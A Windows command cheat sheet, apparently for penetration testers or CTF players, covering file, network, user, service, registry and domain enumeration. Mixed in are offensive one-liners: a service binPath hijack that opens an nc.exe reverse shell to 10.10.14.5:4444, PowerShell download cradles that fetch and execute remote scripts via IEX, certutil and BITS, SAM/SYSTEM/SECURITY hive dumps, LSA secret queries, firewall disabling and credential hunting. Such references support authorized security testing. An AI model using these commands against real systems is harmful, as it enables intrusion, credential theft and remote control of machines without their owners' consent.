Windows Commands Cheat Sheet
#FILE OPERATIONS
REM === CMD ===
REM List directory
dir /a REM all including hidden/system
dir /s /b *.txt REM recursive, bare format
dir /s *pass* *cred* *secret* REM recursive search by name part
REM Permissions
icacls "C:\path" REM view ACL
icacls "C:\path" /grant Everyone:F REM grant full access
icacls "C:\path" /remove Everyone REM remove ACE
icacls "C:\path" /inheritance:r REM remove inherited
takeown /f "C:\path" /r /d y REM take ownership recursive
REM Attributes
attrib +h +s file.txt REM set hidden + system
attrib -h -s file.txt REM clear hidden + system
attrib C:\*.* /s REM view all attributes
REM Copy / Move
copy source dest
move source dest
xcopy "src" "dest" /E /H /C /I /Y REM recursive with hidden
robocopy "src" "dest" /E /COPYALL REM robust copy
REM Find strings
findstr /s /i /p "password" *.txt *.ini
findstr /s /i "admin" C:\inetpub\*.*
findstr /s /i /c:"ConnectionString" *.config
CMD
# === PowerShell ===
# List directory (alias: ls, dir)
Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue
# Find files by name
Get-ChildItem -Path C:\ -Recurse -Force -Filter "*pass*" -ErrorAction SilentlyContinue
# Read file content
Get-Content C:\path\file.txt
gc C:\path\file.txt -Tail 20 # tail equivalent
# Search content
Select-String -Path "C:\*.txt" -Pattern "password"
Get-ChildItem C:\inetpub -Recurse | Select-String "password" | Select -Unique Path
# ACL
Get-Acl -Path "C:\path" | Format-List
POWERSHELL
#NETWORK
REM === CMD ===
ipconfig /all REM full IP config
ipconfig /displaydns REM DNS cache
netstat -ano REM connections (numeric, owning PID)
netstat -anob REM + binary name (admin)
netstat -anp TCP REM TCP only
route print REM routing table
arp -a REM ARP cache
nslookup target.com
nslookup 10.10.10.5 REM reverse lookup
netsh wlan show profiles REM saved WiFi profiles
CMD
# === PowerShell ===
Get-NetIPConfiguration
Get-NetIPAddress | ft
Get-NetRoute | ft
Get-NetTCPConnection | ? State -eq Listen | ft
Test-NetConnection target.com -Port 445
Test-NetConnection 10.10.10.5 -Port 80,443,445,3389
Resolve-DnsName target.com
Get-DnsClientCache
POWERSHELL
#USERS AND GROUPS
REM === CMD ===
whoami /all REM user, groups, privs (comprehensive)
whoami /priv REM privileges only
whoami /groups REM groups only
REM Local users/groups
net user REM list local users
net user username REM user details
net user username password /add /domain REM create domain user
net user username /domain REM domain user details
net localgroup REM list local groups
net localgroup Administrators REM members of local Admin
net localgroup Administrators username /add REM add to local admin
REM Domain users/groups
net user /domain REM list domain users
net group /domain REM list domain groups
net group "Domain Admins" /domain REM list domain admins
net accounts /domain REM domain password policy
CMD
# === PowerShell ===
# Current user
[System.Security.Principal.WindowsIdentity]::GetCurrent()
$env:USERNAME
# Local users
Get-LocalUser | ft Name,Enabled,Description
Get-LocalGroup | ft Name
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
# Domain users (AD module)
Get-ADUser -Filter * -Properties * | select Name,SamAccountName
Get-ADGroup -Filter * | select Name
Get-ADGroupMember "Domain Admins" | select Name
# Without AD module via ADSI
([adsisearcher]"(&(objectCategory=user)(objectClass=user))").FindAll()
([adsisearcher]"(&(objectCategory=group))").FindAll()
# Net equivalent in PS
net user
net localgroup
POWERSHELL
#SERVICES
REM === CMD ===
sc query REM list all services
sc qc servicename REM service config
sc qc servicename REM check binary path
sc stop servicename
sc start servicename
sc config servicename binPath= "cmd.exe /c nc.exe 10.10.14.5 4444 -e cmd.exe"
wmic service get name,pathname,startmode,state
wmic service where "name='Spooler'" get name,startname,pathname
CMD
# === PowerShell ===
Get-Service | ft Name,Status,DisplayName
Get-Service -Name *sql* | ft
Get-CimInstance -ClassName Win32_Service | ft Name,PathName,StartName,State
Get-CimInstance -ClassName Win32_Service | ? PathName -match " " | ft
Get-Service | ? Status -eq Running | ft
POWERSHELL
#SCHEDULED TASKS
REM === CMD ===
schtasks /query /fo LIST /v REM all tasks, verbose
schtasks /query /tn "TaskName" /fo LIST /v REM specific task
schtasks /query /fo TABLE | findstr /i "admin"
CMD
# === PowerShell ===
Get-ScheduledTask | ft TaskName,State
Get-ScheduledTask | ? TaskPath -notmatch "Microsoft" | ft TaskName,TaskPath
Get-ScheduledTask | Get-ScheduledTaskInfo | ft TaskName,LastRunTime
schtasks /query /fo csv | ConvertFrom-Csv | ? TaskName -match "Admin"
POWERSHELL
#REGISTRY
REM === CMD ===
reg query HKLM REM local machine root
reg query HKCU REM current user root
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion /s
reg query HKLM\SYSTEM\CurrentControlSet\Services
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s
REM AlwaysInstallElevated check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REM Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive
REM AutoRun persistence
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REM LSA secrets
reg query HKLM\SECURITY\Policy\Secrets
REM Credential manager
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
CMD
#FIREWALL
REM === CMD ===
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all dir=in
netsh advfirewall firewall add rule name="Open 4444" dir=in action=allow protocol=TCP localport=4444
netsh advfirewall set allprofiles state off REM disable firewall (admin)
netsh firewall show state REM old syntax
CMD
# === PowerShell ===
Get-NetFirewallProfile | ft Name,Enabled
Get-NetFirewallRule | ft Name,Enabled,Direction,Action
Get-NetFirewallRule | ? Direction -eq Inbound | ? Action -eq Allow | ft Name,LocalPort
New-NetFirewallRule -DisplayName "Allow 4444" -Direction Inbound -Protocol TCP -LocalPort 4444 -Action Allow
Set-NetFirewallProfile -All -Enabled False REM disable
POWERSHELL
#DOMAIN ENUMERATION
REM === CMD ===
nltest /dclist:domain.local REM list DCs
nltest /dsgetdc:domain.local REM find primary DC
set l REM show logon server
set u REM show domain name
net view /domain REM list domains
net view /domain:domainname REM list computers in domain
net time /domain REM check DC time
net time \\DC REM synced DC
REM Trusts
nltest /domain_trusts
nltest /domain_trusts /all_trusts
REM Logged-on users (from DC perspective)
query user /server:SERVERNAME
CMD
# === PowerShell ===
Get-ADDomain | ft Name,DomainMode,Forest
Get-ADDomainController -Filter * | ft Name,Site,IPv4Address
Get-ADTrust -Filter *
Get-ADUser -Filter * -Properties MemberOf | ? MemberOf -like "*Domain Admins*"
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
POWERSHELL
#PROCESS AND SYSTEM INFO
REM === CMD ===
tasklist REM list processes
tasklist /svc REM processes + services
tasklist /v REM verbose
tasklist /m ntdll.dll REM processes loading specific DLL
tasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM"
wmic process list brief
wmic process get name,processid,executablepath
wmic qfe get Caption,Description,HotFixID,InstalledOn REM installed patches
systeminfo REM full system info
systeminfo | findstr /i "os name version hotfix"
driverquery /v REM installed drivers
set REM environment variables
CMD
# === PowerShell ===
Get-Process | ft Name,Id,Path,SessionId
Get-Process -IncludeUserName | ft Name,UserName,Id
Get-HotFix | ft HotFixID,InstalledOn,Description
Get-HotFix -Id "KB4012212" REM check specific patch
Get-ComputerInfo | fl
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | ft DisplayName
POWERSHELL
#POWERSHELL ENUMERATION CMDLETS - QUICK REFERENCE
Get-Process # running processes
Get-Service # services
Get-HotFix # installed patches
Get-NetFirewallRule # firewall rules
Get-ExecutionPolicy # PS execution policy
Get-ChildItem Env: # environment variables
Get-LocalUser # local users
Get-LocalGroup # local groups
Get-NetIPConfiguration # network config
Get-NetTCPConnection # network connections
Get-ScheduledTask # scheduled tasks
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* # installed software
Get-WmiObject Win32_LogicalDisk | ft DeviceID,FreeSpace,Size # disk info
Get-WmiObject Win32_QuickFixEngineering # patches (alt)
Get-CimInstance Win32_OperatingSystem | fl Version,BuildNumber,OSArchitecture
POWERSHELL
#USEFUL CMD ONE-LINERS
REM Check if domain-joined
systeminfo | findstr /i "domain" & whoami /all | findstr /i "domain"
REM Dump DNS cache
ipconfig /displaydns > dns_dump.txt
REM Quick file search for creds
dir /s /b C:\*pass* C:\*cred* C:\*.config C:\*.ini 2>nul
REM Check always elevated installer (both must be 0x1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REM Find unquoted service paths
wmic service get name,displayname,pathname,startmode 2>nul | findstr /i "Auto" 2>nul | findstr /i /v "C:\Windows\\" 2>nul | findstr /i /v """
REM Check UAC
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
CMD
#POWERSHELL DOWNLOAD CRADLES
# === Various download methods ===
(New-Object Net.WebClient).DownloadString("http://10.10.14.5/script.ps1") | IEX
(New-Object Net.WebClient).DownloadFile("http://10.10.14.5/nc.exe","C:\temp\nc.exe")
IEX (iwr http://10.10.14.5/script.ps1 -UseBasicParsing)
wget http://10.10.14.5/file.exe -OutFile C:\temp\file.exe
# BITS transfer
Start-BitsTransfer -Source http://10.10.14.5/file.exe -Destination C:\temp\file.exe
# Certutil
certutil -urlcache -f http://10.10.14.5/file.exe C:\temp\file.exe
# Invoke-RestMethod
Invoke-RestMethod -Uri http://10.10.14.5:8000/file.txt
POWERSHELL
#APPLOCKER AND DEFENDER ENUMERATION
# AppLocker and Defender enumeration
Get-AppLockerPolicy -Effective # Check AppLocker policy
Get-MpPreference | select ExclusionPath, ExclusionExtension, ExclusionProcess # Defender exclusions
# WMI-based enumeration (alternative to cmd.exe tools)
Get-CimInstance -ClassName Win32_OperatingSystem # OS info
Get-CimInstance -ClassName Win32_Service | select Name,State,StartMode # Services
POWERSHELL
#CREDENTIAL HUNTING VIA POWERSHELL
# Credential hunting via PowerShell
Select-String -Path C:\Users\*\Desktop\*.txt -Pattern "password|pass|pwd" # Search files for passwords
Get-ChildItem -Path C:\ -Include *.xml,*.ini,*.txt -Recurse -ErrorAction SilentlyContinue | Select-String "password"
POWERSHELL
#INSTALLED SOFTWARE AND SHARES
# Installed software
wmic product get name,version # List installed software (slow)
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*" | select DisplayName,DisplayVersion # Registry method (faster)
# Share enumeration
net share # List local shares
Get-SmbShare # PowerShell share enumeration
POWERSHELL